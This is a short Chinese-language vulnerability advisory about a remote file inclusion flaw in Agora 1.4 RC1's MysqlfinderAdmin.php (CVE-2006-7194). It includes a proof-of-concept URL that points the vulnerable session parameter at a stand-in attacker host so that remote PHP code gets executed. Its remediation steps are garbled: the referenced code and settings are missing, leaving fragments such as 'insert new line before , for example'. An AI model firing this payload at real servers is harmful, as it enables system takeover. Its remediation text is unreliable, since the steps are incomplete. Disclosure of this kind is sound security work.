关键信息 漏洞名称: Agora 1.4 RC1 - 'MysqlfinderAdmin.php' Remote File Inclusion EDB-ID: 2726 CVE: 2006-7194 作者: THE_DAY 类型: WEBAPPS 平台: PHP 日期: 2006-11-06 漏洞描述 应用程序: Agora 版本: 1.4 RC1 URL: http://www.agora.gouv.fr 影响: System access 漏洞来源: From Remote 漏洞细节 文件: modules/Mysqlfinder/MysqlfinderAdmin.php 参数: $_SESSION["PATH_COMPOSANT"] 问题: 传递给参数的输入未在使用前进行适当验证,导致可以从本地或外部资源包含文件,从而执行任意PHP代码。 证明概念 URL: http://target.com/[agora-1.4-path]/modules/Mysqlfinder/MysqlfinderAdmin.php?_SESSION[PATH_COMPOSANT]=http://attacker.com/inject.txt? 解决方案 1. 在 之前插入新行代码,例如 2. 关闭 3. 关闭 以隐藏完整路径错误 时间线 2006-11-01: 发现漏洞 2006-11-01: 联系供应商 2006-11-07: 公开披露